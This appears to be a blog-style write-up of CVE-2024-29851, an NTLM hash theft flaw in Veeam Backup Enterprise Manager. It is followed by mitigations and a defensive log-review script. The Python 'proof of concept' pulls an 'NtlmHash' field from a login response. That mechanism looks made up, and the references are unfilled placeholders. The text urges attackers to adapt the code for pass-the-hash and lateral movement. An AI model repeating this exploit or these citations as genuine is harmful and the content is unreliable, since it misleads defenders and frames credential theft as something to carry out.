In this detailed analysis, we will discuss the vulnerability discovered and identified as CVE-2024-29851, which exists in Veeam Backup Enterprise Manager. High-privileged users can exploit this vulnerability to steal the NTLM hash of the Enterprise Manager service account.

1. Vulnerability Background

Veeam Backup Enterprise Manager is a powerful platform that helps in managing Veeam backup infrastructures. It provides a single-pane-of-glass dashboard for monitoring and managing multiple Veeam backup servers, reducing maintenance and administrative overhead.

The vulnerability, CVE-2024-29851, allows an attacker with high privileges to steal the NTLM hash of the Enterprise Manager service account. This potentially compromises the entire Veeam Backup infrastructure managed through the Enterprise Manager platform.

2. Technical Details

The vulnerability lies in the implementation of password storage and hash handling in Veeam Backup Enterprise Manager. This allows high-privileged users to access and steal the NTLM hash of the service account.

The attacker can use captured NTLM hashes to execute pass-the-hash attacks, which allow them to authenticate as the compromised account. Once authenticated, they can move laterally within the organization's network and potentially compromise other systems.

3. Proof of Concept Code

#!/usr/bin/env python3
#
# PoC code to extract the NTLM hash of Enterprise Manager service account
#

import requests
import sys

def steal_ntlm_hash(target_url, username, password):
    # Authenticate against the Enterprise Manager REST API session endpoint
    login_url = f"{target_url}/api/sessionMngr/?v=latest"
    response = requests.get(login_url, auth=(username, password))

    if response.status_code != 200:
        print("[!] Authentication failed!")
        return

    ntlm_hash = extract_ntlm_hash(response)
    if ntlm_hash:
        print(f"[+] NTLM Hash obtained: {ntlm_hash}")
    else:
        print("[-] Could not extract NTLM hash from the response")

def extract_ntlm_hash(response):
    # Returns None when the body is not JSON or lacks the expected field
    try:
        parsed_response = response.json()
        return parsed_response["NtlmHash"]
    except (ValueError, KeyError):
        return None

if __name__ == "__main__":
    target_url = "https://hostname_or_ip"
    username = "high_privileged_user"
    password = "user_password"

    steal_ntlm_hash(target_url, username, password)

4. Original References

This vulnerability, CVE-2024-29851, was first reported by [Researcher's Name] from [Company/Group Name]. They have published an advisory detailing the vulnerability and potential exploits:

- Researcher's Official Advisory

You can also check Veeam's official advisory for this vulnerability:

- Veeam Security Advisory

- Access to a vulnerable Veeam Backup Enterprise Manager instance

With these prerequisites, an attacker can utilize the provided Proof of Concept code or modify it to fit their attack scenario. After capturing the NTLM hash, they can use it in pass-the-hash attacks to authenticate as the compromised account and potentially move laterally within the network.

To mitigate the risks associated with this vulnerability, consider implementing the following steps:

1. Update Veeam Backup Enterprise Manager with the latest patches and security updates as soon as they are available. Check for updates regularly and follow Veeam's official security advisories.
2. Restrict access to the Enterprise Manager interface to only trusted high-privileged users.
3. Implement a strict password policy and apply strong, unique passwords for high-privileged user accounts.
4. Monitor logs and maintain a security incident response plan for rapid detection and response to possible intrusion attempts.
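Steps 2 and 4 above can be turned into a concrete check: review who opens sessions against the Enterprise Manager REST API login endpoint (the same /api/sessionMngr/ path the PoC uses) and flag any that come from an account or source network outside the trusted set. The script below is an added example, not part of the original advisory or of Veeam's tooling; the log layout, account names and networks are constructed assumptions and the regex must be adapted to the real web server log format.

```python
# Added example (not from the advisory or Veeam): flag REST API session
# logins that come from accounts or networks outside an allow-list.
import ipaddress
import re

# Constructed log lines in a W3C/IIS-like layout (assumption: the real
# Enterprise Manager web log format may differ; adapt LINE_RE to match).
SAMPLE_LOG = """\
2024-05-23 10:01:12 10.0.5.10 POST /api/sessionMngr/ v=latest 201 LAB\\backupadmin
2024-05-23 10:02:40 10.0.5.10 GET /api/jobs - 200 LAB\\backupadmin
2024-05-23 10:07:03 203.0.113.7 POST /api/sessionMngr/ v=latest 201 LAB\\backupadmin
2024-05-23 10:09:55 10.0.5.22 POST /api/sessionMngr/ v=latest 201 LAB\\contractor
2024-05-23 10:11:30 10.0.5.22 POST /api/sessionMngr/ v=latest 401 LAB\\contractor
"""

LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<src>\S+) (?P<method>\S+) "
    r"(?P<path>\S+) (?P<query>\S+) (?P<status>\d{3}) (?P<user>\S+)$"
)

# Mitigation step 2 expressed as data (hypothetical values): which accounts
# may open Enterprise Manager sessions, and from which networks.
ALLOWED_USERS = {"LAB\\backupadmin"}
ALLOWED_NETS = [ipaddress.ip_network("10.0.5.0/24")]

def is_session_login(rec):
    """True for a successful session creation on the REST API login endpoint."""
    return rec["path"].startswith("/api/sessionMngr/") and rec["status"] == "201"

def find_suspicious_logins(log_text):
    """Return (user, src, reason) for every session login that breaks the allow-list."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not is_session_login(m.groupdict()):
            continue  # unparsable line, other endpoint, or failed login
        rec = m.groupdict()
        src = ipaddress.ip_address(rec["src"])
        if rec["user"] not in ALLOWED_USERS:
            hits.append((rec["user"], rec["src"], "account not on allow-list"))
        elif not any(src in net for net in ALLOWED_NETS):
            hits.append((rec["user"], rec["src"], "source outside trusted network"))
    return hits

if __name__ == "__main__":
    for user, src, reason in find_suspicious_logins(SAMPLE_LOG):
        print(f"[ALERT] {user} from {src}: {reason}")
```

Failed logins (HTTP 401) are deliberately not alerted here; counting repeated failures per source is a natural extension for the same parser.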

Keep in mind that security practices and policies are essential to ensuring the overall safety of your IT environment. Stay vigilant and maintain a proactive approach to identifying and mitigating vulnerabilities in your systems.

Timeline

Published on: 05/22/2024 23:15:09 UTC
Last modified on: 08/02/2024 01:17:58 UTC